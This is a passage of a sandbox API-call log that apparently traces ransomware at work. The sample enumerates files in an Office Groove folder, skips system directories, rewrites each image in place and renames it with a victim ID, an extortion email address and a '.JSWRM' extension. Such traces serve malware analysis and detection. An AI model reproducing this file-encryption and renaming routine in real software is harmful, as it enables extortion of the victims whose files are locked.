(lpString1="AlertImage_MediumMAsk.bmp", lpString2="recovery") returned -1 [0131.343] lstrcmpiW (lpString1="AlertImage_MediumMAsk.bmp", lpString2="perflogs") returned -1 [0131.343] lstrcmpiW (lpString1="AlertImage_MediumMAsk.bmp", lpString2="documents and settings") returned -1 [0131.343] lstrcmpiW (lpString1="AlertImage_MediumMAsk.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.343] lstrcmpiW (lpString1="AlertImage_MediumMAsk.bmp", lpString2="system volume information") returned -1 [0131.343] lstrcmpiW (lpString1="AlertImage_MediumMAsk.bmp", lpString2="msocache") returned -1 [0131.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_MediumMAsk.bmp", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_MediumMAsk.bmp", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_MediumMAsk.bmp", lpUsedDefaultChar=0x0) returned 25 [0131.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_MediumMAsk.bmp", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_MediumMAsk.bmp", cchWideChar=25, lpMultiByteStr=0x241308, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_MediumMAsk.bmp", lpUsedDefaultChar=0x0) returned 25 [0131.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.343] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_MediumMAsk.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_mediummask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.344] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=7278) returned 1 [0131.344] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.345] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1c60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x1c60, lpOverlapped=0x0) returned 1 [0131.347] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.347] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1c60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x1c60, lpOverlapped=0x0) returned 1 [0131.347] CloseHandle (hObject=0x264) returned 1 [0131.347] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_MediumMAsk.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_mediummask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_MediumMAsk.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_mediummask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.348] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198634b7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3e78, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_Off.jpg", cAlternateFileName="AL0F2A~1.JPG")) returned 1 [0131.348] lstrcmpiW (lpString1="AlertImage_Off.jpg", lpString2=".") returned 1 [0131.348] lstrcmpiW (lpString1="AlertImage_Off.jpg", lpString2="..") returned 1 [0131.348] lstrcmpiW (lpString1="AlertImage_Off.jpg", lpString2="...") returned 1 [0131.348] lstrcmpiW (lpString1="AlertImage_Off.jpg", lpString2="windows") returned -1 [0131.348] lstrcmpiW (lpString1="AlertImage_Off.jpg", lpString2="recovery") returned -1 [0131.348] lstrcmpiW (lpString1="AlertImage_Off.jpg", lpString2="perflogs") returned -1 [0131.348] lstrcmpiW (lpString1="AlertImage_Off.jpg", lpString2="documents and settings") returned -1 [0131.348] lstrcmpiW (lpString1="AlertImage_Off.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.348] lstrcmpiW (lpString1="AlertImage_Off.jpg", lpString2="system volume information") returned -1 [0131.348] lstrcmpiW (lpString1="AlertImage_Off.jpg", lpString2="msocache") returned -1 [0131.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_Off.jpg", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0131.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_Off.jpg", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_Off.jpg", lpUsedDefaultChar=0x0) returned 18 [0131.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_Off.jpg", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0131.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_Off.jpg", cchWideChar=18, lpMultiByteStr=0x2413a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_Off.jpg", lpUsedDefaultChar=0x0) returned 18 [0131.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Off.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_off.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.351] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=15992) returned 1 [0131.351] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.351] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3e70, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x3e70, lpOverlapped=0x0) returned 1 [0131.354] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.354] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3e70, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x3e70, lpOverlapped=0x0) returned 1 [0131.354] CloseHandle (hObject=0x264) returned 1 [0131.354] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Off.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_off.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Off.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_off.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.355] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198634b7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c6e, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_OffMask.bmp", cAlternateFileName="ALA9A1~1.BMP")) returned 1 [0131.355] lstrcmpiW (lpString1="AlertImage_OffMask.bmp", lpString2=".") returned 1 [0131.355] lstrcmpiW (lpString1="AlertImage_OffMask.bmp", lpString2="..") returned 1 [0131.355] lstrcmpiW (lpString1="AlertImage_OffMask.bmp", lpString2="...") returned 1 [0131.355] lstrcmpiW (lpString1="AlertImage_OffMask.bmp", lpString2="windows") returned -1 [0131.355] lstrcmpiW (lpString1="AlertImage_OffMask.bmp", lpString2="recovery") returned -1 [0131.355] lstrcmpiW (lpString1="AlertImage_OffMask.bmp", lpString2="perflogs") returned -1 [0131.355] lstrcmpiW (lpString1="AlertImage_OffMask.bmp", lpString2="documents and settings") returned -1 [0131.355] lstrcmpiW (lpString1="AlertImage_OffMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.355] lstrcmpiW (lpString1="AlertImage_OffMask.bmp", lpString2="system volume information") returned -1 [0131.355] lstrcmpiW (lpString1="AlertImage_OffMask.bmp", lpString2="msocache") returned -1 [0131.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_OffMask.bmp", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_OffMask.bmp", cchWideChar=22, lpMultiByteStr=0x241330, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_OffMask.bmp", lpUsedDefaultChar=0x0) returned 22 [0131.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_OffMask.bmp", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_OffMask.bmp", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_OffMask.bmp", lpUsedDefaultChar=0x0) returned 22 [0131.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_OffMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_offmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.356] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=7278) returned 1 [0131.356] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.356] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1c60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x1c60, lpOverlapped=0x0) returned 1 [0131.358] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.358] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1c60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x1c60, lpOverlapped=0x0) returned 1 [0131.358] CloseHandle (hObject=0x264) returned 1 [0131.359] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_OffMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_offmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_OffMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_offmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.360] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1983d259, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2256, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="CommsIncomingImage.jpg", cAlternateFileName="COMMSI~1.JPG")) returned 1 [0131.360] lstrcmpiW (lpString1="CommsIncomingImage.jpg", lpString2=".") returned 1 [0131.383] lstrcmpiW (lpString1="CommsIncomingImage.jpg", lpString2="..") returned 1 [0131.383] lstrcmpiW (lpString1="CommsIncomingImage.jpg", lpString2="...") returned 1 [0131.383] lstrcmpiW (lpString1="CommsIncomingImage.jpg", lpString2="windows") returned -1 [0131.383] lstrcmpiW (lpString1="CommsIncomingImage.jpg", lpString2="recovery") returned -1 [0131.383] lstrcmpiW (lpString1="CommsIncomingImage.jpg", lpString2="perflogs") returned -1 [0131.383] lstrcmpiW (lpString1="CommsIncomingImage.jpg", lpString2="documents and settings") returned -1 [0131.383] lstrcmpiW (lpString1="CommsIncomingImage.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.383] lstrcmpiW (lpString1="CommsIncomingImage.jpg", lpString2="system volume information") returned -1 [0131.383] lstrcmpiW (lpString1="CommsIncomingImage.jpg", lpString2="msocache") returned -1 [0131.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImage.jpg", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImage.jpg", cchWideChar=22, lpMultiByteStr=0x241128, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsIncomingImage.jpg", lpUsedDefaultChar=0x0) returned 22 [0131.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImage.jpg", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0131.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImage.jpg", cchWideChar=22, lpMultiByteStr=0x2410d8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsIncomingImage.jpg", lpUsedDefaultChar=0x0) returned 22 [0131.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0131.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0131.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0131.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImage.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsincomingimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.385] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=8790) returned 1 [0131.385] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2250) returned 0x27b348 [0131.385] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2250, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x2250, lpOverlapped=0x0) returned 1 [0131.387] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.387] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2250, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x2250, lpOverlapped=0x0) returned 1 [0131.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0131.387] CloseHandle (hObject=0x264) returned 1 [0131.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0131.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0131.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0131.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0131.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247990 [0131.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0131.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0131.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0131.388] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImage.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsincomingimage.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImage.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsincomingimage.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0131.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0131.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0131.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0131.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0131.389] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d8, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="CommsIncomingImageMask.bmp", cAlternateFileName="COMMSI~1.BMP")) returned 1 [0131.389] lstrcmpiW (lpString1="CommsIncomingImageMask.bmp", lpString2=".") returned 1 [0131.389] lstrcmpiW (lpString1="CommsIncomingImageMask.bmp", lpString2="..") returned 1 [0131.389] lstrcmpiW (lpString1="CommsIncomingImageMask.bmp", lpString2="...") returned 1 [0131.389] lstrcmpiW (lpString1="CommsIncomingImageMask.bmp", lpString2="windows") returned -1 [0131.389] lstrcmpiW (lpString1="CommsIncomingImageMask.bmp", lpString2="recovery") returned -1 [0131.389] lstrcmpiW (lpString1="CommsIncomingImageMask.bmp", lpString2="perflogs") returned -1 [0131.389] lstrcmpiW (lpString1="CommsIncomingImageMask.bmp", lpString2="documents and settings") returned -1 [0131.389] lstrcmpiW (lpString1="CommsIncomingImageMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.389] lstrcmpiW (lpString1="CommsIncomingImageMask.bmp", lpString2="system volume information") returned -1 [0131.389] lstrcmpiW (lpString1="CommsIncomingImageMask.bmp", lpString2="msocache") returned -1 [0131.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0131.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImageMask.bmp", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0131.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0131.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImageMask.bmp", cchWideChar=26, lpMultiByteStr=0x240f48, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsIncomingImageMask.bmp", lpUsedDefaultChar=0x0) returned 26 [0131.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0131.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0131.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImageMask.bmp", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0131.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0131.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 